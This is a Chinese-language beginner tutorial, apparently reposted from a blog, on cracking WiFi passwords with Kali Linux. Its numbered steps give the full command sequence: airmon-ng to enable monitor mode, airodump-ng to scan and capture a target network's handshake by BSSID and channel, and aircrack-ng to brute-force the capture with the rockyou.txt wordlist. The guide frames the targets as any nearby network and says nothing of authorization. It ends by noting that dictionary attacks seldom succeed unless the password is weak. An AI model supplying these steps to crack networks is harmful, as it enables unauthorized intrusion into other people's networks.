准备工作:网卡 (必须有监听模式)!!!
我自己笔记本自带的网卡不行 其它的我并不知道
–本人用的网卡芯片是8187L (可以到淘宝购买,建议小白淘个二手就可以,也不贵也不怕搞坏)
–插上网卡后一定要确定连接上虚拟机 (在右上方菜单中点击虚拟机 会有个可移动设备 里面会看到自己的网卡是否连接上虚拟机)
打开kali系统的终端
①ifconfig 查看网卡信息 出现wlan0表示连接成功 -可能网卡名字不太一样
如果没出现 可输入 ifconfig wlan0 up 打开网卡
ifconfig wlan0 down 关闭网卡
②airmon-ng start wlan0 开启网卡监听模式 -打开监听模式也有多种方法
先关闭无线网卡 ifconfig wlan0 down -若不关闭可能会有报错
输入 ifconfig wlan0 mode monitor 打开监听模式
再输入 ifconfig wlan0 up 打开网卡
③iwconfig 查看网卡信息 -输入ifconfig也可以
wlan0变为 wlan0mon 就表示成功
④airodump-ng wlan0mon 开始扫描附近WiFi 按Ctrl+c停止扫描
BSSID为WiFi的MAC地址
PWR为信号强弱程度,数值越小信号越强
#DATA为数据量,越大使用的人就越多
CH为信道频率(频道)
ESSID为WiFi名称,中文可能会出现乱码
⑤airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon //开始抓包
–上面这个只是语法 要破解哪个WiFi 就把对应的填入就行
如 airodump-ng --bssid 00:00:00:00:00:00 -c 0 -w /home/zhuabao/ wlan0mon
–抓包存储的路径自己设置就行
–抓包时该WiFi必须有设备连接 要不然就抓不到 一个WiFi大部分时候都会有设备连接要不然要WiFi干嘛
⑥cd /home/zhuabao/ 打开抓包目录
ls 列出文件夹的所有内容
⑦cd / 返回到根目录
⑧aircrack-ng -w 字典路径 抓包路径 -开始爆破
如 aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/zhuabao/-01.cap
–kali的默认字典路径就在/usr/share/wordlists/rockyou.txt 前提你的密码字典必须是.txt 文件
kali的字典本来是一个压缩包 你手动解压一下就可以
密码字典可以换为其他的
–字典路径 和 抓包路径 是你自己的放的地方
⑨如果找到密码 会显示 Key Found !
⑩airmon-ng stop wlan0mon 关闭监听模式 --关不关其实无所谓
==============================================================================
特别说明:跑字典其实就是让电脑一个密码一个密码的试 电脑性能好的话就快 电脑性能不好的就慢还容易电脑黑屏 关机 死机 CPU过热 等问题
注意这里说的快慢并不是说找到密码的快慢 只是电脑测试密码的速度
个人见解:你必须有一个非常不错的字典 并不是说密码多就好 但是对于不是很专业的小白来说 根本就没有那种字典
网上下载的也很不靠谱
只要你用过密码字典 打开看过的人都知道 一般的密码字典 密码都不是很靠谱的
除非你跟这个WiFi有什么深仇大恨 个人不推荐使用跑字典这个方法
跑字典找到WiFi密码只存在理论之上 耗时耗力耗物资 全看运气 除非WiFi密码是弱密码特别简单的 要不然你根本就找不到
版权归原作者 HaoRine 所有, 如有侵权,请联系我们删除。